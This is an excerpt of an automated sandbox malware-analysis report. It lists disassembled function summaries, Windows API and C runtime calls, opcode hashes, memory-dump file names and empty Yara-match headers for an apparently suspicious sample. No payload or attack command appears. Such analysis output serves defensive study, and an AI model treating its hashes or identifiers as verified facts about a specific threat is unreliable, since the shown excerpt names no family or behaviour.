                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                                              • Opcode ID: 143b49d3a021703b772fcdd86ecebaacd90ad87de0f0082262faaef224370097
                                                                                                                                                                                                                                                              • Instruction ID: b7d3bdc87091e4ce03addd9451c2214eeb45f1b9334687ac528376ffe69be6d3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 143b49d3a021703b772fcdd86ecebaacd90ad87de0f0082262faaef224370097
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDD16A76D042589FCF11CFA8D8809EDBBF5FF08310F18456AE855EB251D730AA96CB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                                              • Opcode ID: abd7e70984516035e69c1e90cb42cc8bd6e067904d519d39c34710a9f91d8bca
                                                                                                                                                                                                                                                              • Instruction ID: 8055e51eb2747d8c45f6ddd51508f440304c7050239ac984dea9f1e958e84898
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abd7e70984516035e69c1e90cb42cc8bd6e067904d519d39c34710a9f91d8bca
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D51B3B1A0520AAFEB298F54F981BBBB7A4FF45720F14452DE806872D2D731ED41D790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A17152
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00A17159
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00A17193
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00A1719A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                                              • Opcode ID: d65716e84908e54c45de48ca6d00cacb542bf618f8cb5c38151d4d8662e3f568
                                                                                                                                                                                                                                                              • Instruction ID: 54329dd1978ca2f842227c334dd2788db510622a999ddfd3f83fc43e3092ab0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d65716e84908e54c45de48ca6d00cacb542bf618f8cb5c38151d4d8662e3f568
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A219871604609BFDB21EF659E81CAFB7B9EF443647108619F95997261DB30ECC087A0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cad1c00c60e748bcde132227ce895556006c50d840eb69a6b2a0ad6fd5b724c7
                                                                                                                                                                                                                                                              • Instruction ID: 90d6b4a2e2959408b61f988bf03a5066c2b912026bf06c41214a0c3c28527744
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cad1c00c60e748bcde132227ce895556006c50d840eb69a6b2a0ad6fd5b724c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35219D3160020DAFDB20EF71BD80D6A77A9EF04364B108D25F859D7291EB31EC50A7A0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00A1808C
                                                                                                                                                                                                                                                                • Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E
                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A180C4
                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A180E4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                                              • Opcode ID: 6b303717635924df7e95f155b9b86b209659f5662411a0774059fd758c023792
                                                                                                                                                                                                                                                              • Instruction ID: 1067d1719f687ff238119eeee79f6eda73d16c65a41f8a4b5f4afce04562e6c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b303717635924df7e95f155b9b86b209659f5662411a0774059fd758c023792
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C511C4B2505519BE671167F19D8ECEF796DDF593A47204224FA05D1101FF78DD8282B0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction ID: ba0fb26c0215c6ec26a49a7ed249d1daf5ce8ddf658b1cddf3e8c06aca939f23
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611487A40414EBBCF125F84CD428EE3F62BF98394B588516FA2859031C337C9B6AB81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00A428BC
                                                                                                                                                                                                                                                                • Part of subcall function 00A43214: __getptd_noexit.LIBCMT ref: 00A43217
                                                                                                                                                                                                                                                                • Part of subcall function 00A43214: __amsg_exit.LIBCMT ref: 00A43224
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00A428DC
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00A428EC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00A4291C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3170801528-0
                                                                                                                                                                                                                                                              • Opcode ID: bcc54860c0364ad39d5e278b36aed9ff1ade0f683d854c4eb23ae6917159c085
                                                                                                                                                                                                                                                              • Instruction ID: 6da46802937a7f82132b0894ac577bf9af3caba629100c53acaf4ac929d6dfbf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc54860c0364ad39d5e278b36aed9ff1ade0f683d854c4eb23ae6917159c085
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101B53AE01621ABDB31AF65AD0575DB7A0FFC4720FD44016F814A7292CB346E82CBE5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000), ref: 00A1C5AB
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000,00000000,?,00A1445A,00000000), ref: 00A1C5B7
                                                                                                                                                                                                                                                                • Part of subcall function 00A1C57D: CloseHandle.KERNEL32(FFFFFFFE,00A1C5C7,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000,00000000), ref: 00A1C58D
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00A1C5C7
                                                                                                                                                                                                                                                                • Part of subcall function 00A1C53F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A1C56E,00A1B471,00000000,?,00A13ED3,00000000,00000000,00000000,00000000), ref: 00A1C552
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000), ref: 00A1C5DC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                                              • Opcode ID: ceba52235565165535f1d21e26e54f4abc275134138ec85663130d0ed0d98234
                                                                                                                                                                                                                                                              • Instruction ID: 54aa841bab9eb4b4fea0c58f0b0280573c7bf8271822480a1be920f7098e9447
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceba52235565165535f1d21e26e54f4abc275134138ec85663130d0ed0d98234
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF01C36481265BFCF225FD5EC059DA7F66EB487B1F004160FA4986120C6329962DB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog3_catch_strlen
                                                                                                                                                                                                                                                              • String ID: ASubcioXAos
                                                                                                                                                                                                                                                              • API String ID: 3133806014-3705083126
                                                                                                                                                                                                                                                              • Opcode ID: d6d0d013672d2188e9cd481f838136ae5e1718f6ea63cf9bdc684df465329a26
                                                                                                                                                                                                                                                              • Instruction ID: 6370ec6285dd7dfb73f8a59d8de6cf5496f63742ad17507137a26d9022cdd0c9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6d0d013672d2188e9cd481f838136ae5e1718f6ea63cf9bdc684df465329a26
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41813D70E002188FDB24DF9CE994AADBBF1BF98320F24826AE459A73D1D7319D41CB55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00A01C8E
                                                                                                                                                                                                                                                                • Part of subcall function 00A0353D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A03549
                                                                                                                                                                                                                                                                • Part of subcall function 00A021B1: _strlen.LIBCMT ref: 00A021C9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Xinvalid_argument_strlenstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                              • String ID: Divide$map/set too long
                                                                                                                                                                                                                                                              • API String ID: 16509066-2202391395
                                                                                                                                                                                                                                                              • Opcode ID: 8f6b7c89fad4890d3fa4d4dc4937d8f6b650aeb5080d10428074270461382a63
                                                                                                                                                                                                                                                              • Instruction ID: b8444e8c310447d7fdcdb7e4e82d4b88749925d950042115e8e53cacee968fd9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f6b7c89fad4890d3fa4d4dc4937d8f6b650aeb5080d10428074270461382a63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA5104311083588FC311EF28E9846AABFE4BF95314F08096DE9D587293D374D909C792
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog3_catch_strlen
                                                                                                                                                                                                                                                              • String ID: Brightness
                                                                                                                                                                                                                                                              • API String ID: 3133806014-2519455027
                                                                                                                                                                                                                                                              • Opcode ID: 0729c7d722f97faabd801073a6fc46dcf99e4890b9d47311cbc837f86728da9f
                                                                                                                                                                                                                                                              • Instruction ID: cc316814fad3ef11b4f6cd7e51c743c18f0241a30179dd9bf62e212ba986e3a3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0729c7d722f97faabd801073a6fc46dcf99e4890b9d47311cbc837f86728da9f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD418771B00318CFD725DB9CE9C8AAC77F1BF58724F24426AE115AB2E1C6729D82CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 00A0A082
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: d76fba7cdd64f4d16103d4210a4566ce13707cf34c686f036689be5fdf8dbcaf
                                                                                                                                                                                                                                                              • Instruction ID: 3ab45f77360c6f4cae990faa8e455b167ad4563ec47dd05ebee9350ba6c2de57
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d76fba7cdd64f4d16103d4210a4566ce13707cf34c686f036689be5fdf8dbcaf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6041683190020DAFCF15DF98ED81AEEBBB5FF58300F148259F904672A1D3359951DB52
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00A015DC
                                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A01614
                                                                                                                                                                                                                                                                • Part of subcall function 00A037E7: _Yarn.LIBCPMT ref: 00A03806
                                                                                                                                                                                                                                                                • Part of subcall function 00A037E7: _Yarn.LIBCPMT ref: 00A0382A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                                              • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                                              • Opcode ID: 472539386d5cfe171542761d5781202b00b3aadd97b393345451ba818b6ff7c5
                                                                                                                                                                                                                                                              • Instruction ID: 54010370cb066a67c165f3cb3d817df97ce47bd3e9435af148910b1e304ff0ab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 472539386d5cfe171542761d5781202b00b3aadd97b393345451ba818b6ff7c5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F06D72505B809EC3308F7AA990443FBE8BE29310780CE2EE0DEC3A51C330A504CB69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00A37E93
                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00A37EA8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
